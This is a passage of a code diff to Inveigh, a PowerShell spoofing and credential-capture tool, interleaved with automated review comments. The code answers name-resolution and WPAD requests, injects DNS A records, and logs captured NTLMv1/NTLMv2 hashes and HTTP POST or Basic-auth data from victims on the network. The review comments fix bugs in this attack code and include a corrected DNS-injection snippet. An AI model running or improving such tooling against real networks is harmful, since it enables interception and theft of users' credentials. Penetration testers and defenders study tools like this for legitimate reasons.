if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
- $inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null
- $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Authentication = $HTTPAuth") > $null
+ $inveigh.output_queue.Add("[+] WPAD Authentication = $WPADAuth") > $null
if($WPADAuth -like "NTLM*")
{
@@ -1007,48 +1026,48 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
if($WPADAuthIgnore.Count -gt 0)
{
- $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
}
}
if($HTTPDir -and !$HTTPResponse)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Directory = $HTTPDir") > $null
if($HTTPDefaultFile)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Default Response File = $HTTPDefaultFile") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Default Response File = $HTTPDefaultFile") > $null
}
if($HTTPDefaultEXE)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE") > $null
}
}
if($HTTPResponse)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Response = Enabled") > $null
}
if($HTTPResponse -or $HTTPDir -and $HTTPContentType -ne 'html/text')
{
- $inveigh.status_queue.Add("HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null
}
if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
{
- $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null
+ $inveigh.output_queue.Add("[+] Basic Authentication Realm = $HTTPBasicRealm") > $null
}
$HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
if($HTTPResetDelay.Count -gt 0)
{
- $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
- $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
}
if($Proxy -eq 'Y')
@@ -1057,19 +1076,19 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
if($proxy_port_check)
{
$Proxy = "N"
- $inveigh.status_queue.Add("Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null
+ $inveigh.output_queue.Add("[-] Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null
}
else
{
- $inveigh.status_queue.Add("Proxy Capture = Enabled") > $null
- $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null
- $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null
+ $inveigh.output_queue.Add("[+] Proxy Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Proxy Port = $ProxyPort") > $null
+ $inveigh.output_queue.Add("[+] Proxy Authentication = $ProxyAuth") > $null
$ProxyPortFailover = $ProxyPort + 1
$ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
if($ProxyIgnore.Count -gt 0)
{
- $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
}
if($ProxyIP -eq '0.0.0.0')
@@ -1101,27 +1120,27 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
$WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
}
- $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
+ $inveigh.output_queue.Add("[+] WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
if($WPADResponse -and $Proxy -eq 'N')
{
- $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD Custom Response = Enabled") > $null
}
elseif($WPADResponse -and $Proxy -eq 'Y')
{
- $inveigh.status_queue.Add("WPAD Proxy Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD Proxy Response = Enabled") > $null
if($WPADIP -and $WPADPort)
{
- $inveigh.status_queue.Add("WPAD Failover = $WPADIP`:$WPADPort") > $null
+ $inveigh.output_queue.Add("[+] WPAD Failover = $WPADIP`:$WPADPort") > $null
}
}
elseif($WPADIP -and $WPADPort)
{
- $inveigh.status_queue.Add("WPAD Response = Enabled") > $null
- $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null
+ $inveigh.output_queue.Add("[+] WPAD Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD = $WPADIP`:$WPADPort") > $null
if($WPADDirectHosts)
{
@@ -1131,7 +1150,7 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
}
$WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
- $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
+ $inveigh.output_queue.Add("[+] WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
else
{
@@ -1141,20 +1160,20 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
}
elseif($WPADDirectFile -eq 'Y')
{
- $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] WPAD Default Response = Enabled") > $null
$WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}"
}
if($Challenge)
{
- $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
+ $inveigh.output_queue.Add("[+] NTLM Challenge = $Challenge") > $null
}
}
if($MachineAccounts -eq 'N')
{
- $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Machine Account Capture = Disabled") > $null
$inveigh.machine_accounts = $false
}
else
@@ -1167,22 +1186,22 @@ if($ConsoleOutput -ne 'N')
if($ConsoleOutput -eq 'Y')
{
- $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output = $ConsoleOutput") > $null
}
$inveigh.console_output = $true
if($ConsoleStatus -eq 1)
{
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minute") > $null
}
elseif($ConsoleStatus -gt 1)
{
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minutes") > $null
}
}
@@ -1191,11 +1210,11 @@ else
if($inveigh.tool -eq 1)
{
- $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output Disabled Due To External Tool Selection") > $null
}
else
{
- $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Disabled") > $null
}
}
@@ -1211,13 +1230,13 @@ else
if($FileOutput -eq 'Y')
{
- $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
- $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
+ $inveigh.output_queue.Add("[+] Real Time File Output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Output Directory = $output_directory") > $null
$inveigh.file_output = $true
}
else
{
- $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Real Time File Output = Disabled") > $null
}
if($FileUnique -eq 'Y')
@@ -1229,70 +1248,94 @@ else
$inveigh.file_unique = $false
}
+if($LogOutput -eq 'Y')
+{
+ $inveigh.log_output = $true
+}
+else
+{
+ $inveigh.log_output = $false
+}
+
if($RunCount)
{
- $inveigh.status_queue.Add("Run Count = $RunCount") > $null
+ $inveigh.output_queue.Add("[+] Run Count = $RunCount") > $null
}
if($RunTime -eq 1)
{
- $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minute") > $null
}
elseif($RunTime -gt 1)
{
- $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minutes") > $null
}
if($ShowHelp -eq 'Y')
{
- $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null
+ $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop manually") > $null
if($inveigh.console_output)
{
- $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
+ $inveigh.output_queue.Add("[*] Press any key to stop real time console output") > $null
}
}
-if($inveigh.status_output)
+while($inveigh.output_queue.Count -gt 0)
{
- while($inveigh.status_queue.Count -gt 0)
+ switch -Wildcard ($inveigh.output_queue[0])
{
- switch -Wildcard ($inveigh.status_queue[0])
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
- {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"}
+ if($inveigh.status_output -and $inveigh.output_stream_only)
{
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Warning($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Warning($inveigh.status_queue[0])
- }
-
- $inveigh.status_queue.RemoveAt(0)
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
}
- default
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ default
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
{
+ Write-Output($inveigh.output_queue[0])
+ }
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.status_queue[0])
- }
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
- $inveigh.status_queue.RemoveAt(0)
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
}
+ $inveigh.output_queue.RemoveAt(0)
}
}
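Review bot: The new case label at the top of the `while` loop (the pair of `-like` tests) only matches the `[!]`/`[-]` messages by accident: inside a double-quoted string the backticks are consumed by the string parser, so the wildcard engine receives `?[!]*` and `?[-]*`, where `?` eats the leading `[` and `[!]` is a one-character class — any message whose second character happens to be `!` or `-` would also take the warning path. `{$_.StartsWith('[!]') -or $_.StartsWith('[-]')}` states the intent directly and does not depend on escape-sequence behaviour. The two branches are otherwise identical apart from `Write-Warning` versus `Write-Output`; the `file_output`/`log_output` bookkeeping and the `RemoveAt(0)` could be hoisted after the `switch` so the only per-case code is the console write.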
@@ -1344,6 +1387,70 @@ $shared_basic_functions_scriptblock =
return $string_extract
}
+ function SpooferResponseMessage
+ {
+ param ([String]$query_string,[String]$mDNS_type)
+
+ $response_type = "[+]"
+
+ if($SpooferHostsReply -and $SpooferHostsReply -notcontains $query_string)
+ {
+ $response_message = "[$query_string not on reply list]"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $query_string)
+ {
+ $response_message = "[$query_string is on ignore list]"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $response_message = "[$source_IP not on reply list]"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $response_message = "[$source_IP is on ignore list]"
+ }
+ elseif($inveigh.valid_host_list -contains $query_string)
+ {
+ $response_message = "[$query_string is a valid host]"
+ }
+ elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
+ {
+ $response_message = "[previous capture from $source_IP]"
+ }
+ elseif($source_IP -eq $IP)
+ {
+ $response_message = "[ignoring local request]"
+ }
+ elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
+ {
+ $response_message = ": " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
+ }
+ elseif($destination_IP.IPAddressToString -eq $IP)
+ {
+ $response_message = "[ResponderGuard detected and ignored]"
+ $response_type = "[!]"
+ }
+ elseif($NBNSTypes -notcontains $NBNS_query_type)
+ {
+ $response_message = "[disabled NBNS type]"
+ }
+ elseif($query_string.Trim() -eq '*')
+ {
+ $response_message = "[NBSTAT request]"
+ }
+ elseif($mDNS_type -and $mDNSTypes -notcontains $mDNS_type)
+ {
+ $response_message = "[disabled mDNS type]"
+ }
+ else
+ {
+ $response_message = "[something went wrong]"
+ $response_type = "[-]"
+ }
+
+ return $response_type,$response_message
+ }
+
function ConvertFrom-PacketOrderedDictionary
{
param($packet_ordered_dictionary)
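Review bot: SpooferResponseMessage declares only `$query_string` and `$mDNS_type` but also reads `$source_IP`, `$destination_IP`, `$NBNS_query_type`, `$spoofer_learning_stopwatch` and `$spoofer_learning_delay` from whatever scope calls it, which is fragile for a function in a scriptblock that is presumably loaded into separate runspaces; passing them as parameters, or at least a comment above `param` naming the caller-scope variables it depends on, would make the contract visible. The `$NBNSTypes -notcontains $NBNS_query_type` branch is evaluated before the mDNS-type branch, so if `$NBNS_query_type` is not set for an mDNS query — the caller is not in this diff — the `[disabled mDNS type]` message is unreachable. The `: N minute(s) until spoofing starts` message also breaks the bracketed format every other branch uses.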
@@ -1356,6 +1463,62 @@ $shared_basic_functions_scriptblock =
return $byte_array
}
+
+
+}
+
+# DNS Functions ScriptBlock
+$DNS_functions_scriptblock =
+{
+
+ function DNSUpdate
+ {
+ param ([String]$DNSName,[String]$DNSData,[Int]$DNSTTL)
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNSName -DNSData $DNSData -DNSTTL $DNSTTL
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $inveigh.DNS_list.Add("1," + $_.Name) > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " added") > $null
+ }
+ elseif($DNS_update -eq "[-] Kerberos preauthentication error 0x06")
+ {
+ $inveigh.DNS = $false
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Disabling DNS injection due to auth failure") > $null
+ }
+ else
+ {
+ $inveigh.DNS_list.Add("0," + $_.Name) > $null
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " add failed") > $null
+ }
+
+ }
+
+ function DNSCheck
+ {
+ param ([String]$DNSData,[Array]$DNSHostsIgnore,[Int]$DNSThreshold,[Int]$DNSTTL)
+
+ $inveigh.requested_host_list | Group-Object | ForEach-Object {
+
+ if($_.Count -gt $DNSThreshold)
+ {
+
+ if($DNSHostsIgnore -NotContains $_.Name -and $inveigh.DNS_list -NotContains "0,$($_.Name)" -and $inveigh.DNS_list -NotContains "1,$($_.Name)")
+ {
+ DNSUpdate $_.Name $DNSData $DNSTTL
+ }
+ elseif($DNSHostsIgnore -Contains $_.Name)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Ignored $($_.Name) for DNS injection")
+ }
+
+ }
+
+ }
+
+ }
+
}
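Review bot: DNSUpdate takes `$DNSName` but records and reports `$_.Name` on four lines, which only resolves because PowerShell's dynamic scoping lets the function see the ForEach-Object `$_` of its caller; any call to DNSUpdate outside that loop would write an empty name into `DNS_list` and the messages. In DNSCheck the `Ignored ... for DNS injection` `Add()` lacks `> $null`, so the ArrayList index leaks into the function's output, and that message repeats on every pass because ignored names are never recorded. The `-gt $DNSThreshold` test also contradicts the `.PARAMETER DNSThreshold` help added in this diff, which says injection happens once the count reaches the threshold; `-ge` matches the documentation. DNSUpdate clears `$inveigh.DNS` after a Kerberos preauthentication failure, but DNSCheck never consults that flag before calling DNSUpdate, so unless the unseen caller gates on it, updates keep being attempted after the auth failure.
```powershell
function DNSUpdate
{
    param ([String]$DNSName,[String]$DNSData,[Int]$DNSTTL)

    $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNSName -DNSData $DNSData -DNSTTL $DNSTTL

    if($DNS_update -eq "[+] DNS update successful")
    {
        $inveigh.DNS_list.Add("1,$DNSName") > $null
        $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] DNS host (A) record for $DNSName added") > $null
    }
    # … unchanged: Kerberos preauthentication branch …
    else
    {
        $inveigh.DNS_list.Add("0,$DNSName") > $null
        $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $DNSName add failed") > $null
    }
}

# … unchanged: DNSCheck header and Group-Object pipeline …
        if($inveigh.DNS -and $_.Count -ge $DNSThreshold)
        {
            # … unchanged: DNSUpdate call for names not ignored and not yet attempted …
            elseif($DNSHostsIgnore -Contains $_.Name)
            {
                $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Ignored $($_.Name) for DNS injection") > $null
            }
        }
```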
# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
@@ -1417,42 +1580,31 @@ $SMB_NTLM_functions_scriptblock =
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
- $inveigh.NTLMv2_list.Add($NTLMv2_hash)
+ $inveigh.NTLMv2_list.Add($NTLMv2_hash) > $null
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash") > $null
}
else
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
{
$inveigh.NTLMv2_file_queue.Add($NTLMv2_hash)
- $inveigh.console_queue.Add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
}
if($inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
{
- $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+ $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") > $null
}
if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
{
- $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+ $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) > $null
}
}
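Review bot: `$inveigh.NTLMv2_file_queue.Add($NTLMv2_hash)` in the file-output branch is the one collection Add in this hunk that did not receive the `> $null` the commit adds everywhere else, so the returned ArrayList index is written to the runspace's output stream. The same omission is on the `NTLMv1_list.Add` and `NTLMv1_file_queue.Add` lines of the next hunk and on the `NTLMv1_file_queue.Add` / `NTLMv2_file_queue.Add` lines in the $HTTP_scriptblock hunks. The enclosing $SMB_NTLM_functions_scriptblock starts and ends outside the hunk.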
@@ -1464,42 +1616,31 @@ $SMB_NTLM_functions_scriptblock =
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
- }
-
$inveigh.NTLMv1_list.Add($NTLMv1_hash)
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash") > $null
}
else
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($NTLMv1_hash)
- $inveigh.console_queue.Add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
}
if($inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
{
- $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+ $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") > $null
}
if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
{
- $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+ $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) > $null
}
}
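Review bot: The `SMB NTLMv1 challenge/response written to` line is tagged `[-]`, the prefix this commit otherwise uses for failures (`Error starting ...`), while the equivalent NTLMv2 line in the previous hunk and the HTTP NTLMv1/NTLMv2 lines use `[!]`; change it to `$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null`. Anything that filters or colours output by the leading tag would otherwise report a successful write as an error. The enclosing scriptblock continues outside the hunk.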
@@ -1612,19 +1753,8 @@ $HTTP_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
$HTTP_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener") > $null
}
:HTTP_listener_loop while($inveigh.running -and $HTTP_running)
@@ -1742,38 +1872,13 @@ $HTTP_scriptblock =
if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null
if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null
}
}
@@ -1829,21 +1934,9 @@ $HTTP_scriptblock =
if($HTTP_POST_request_old -ne $HTTP_POST_request)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP")
- $inveigh.POST_request_file_queue.Add($HTTP_POST_request)
- $inveigh.POST_request_list.Add($HTTP_POST_request)
-
- if($inveigh.file_output)
- {
- $inveigh.console_queue.Add("$HTTP_type POST request written to " + $inveigh.POST_request_out_file)
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
- }
-
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP") > $null
+ $inveigh.POST_request_file_queue.Add($HTTP_POST_request) > $null
+ $inveigh.POST_request_list.Add($HTTP_POST_request) > $null
}
$HTTP_POST_request_old = $HTTP_POST_request
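Review bot: The notification that the POST request was written to `$inveigh.POST_request_out_file` is dropped here along with the old log plumbing, while the NTLM and Basic-auth paths in the later hunks keep their `written to` messages under `if($inveigh.file_output)`. If that is not intended, add `if($inveigh.file_output) { $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type POST request written to " + $inveigh.POST_request_out_file) > $null }` after the `POST_request_list.Add` line. The enclosing $HTTP_scriptblock continues outside the hunk.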
@@ -1893,36 +1986,26 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
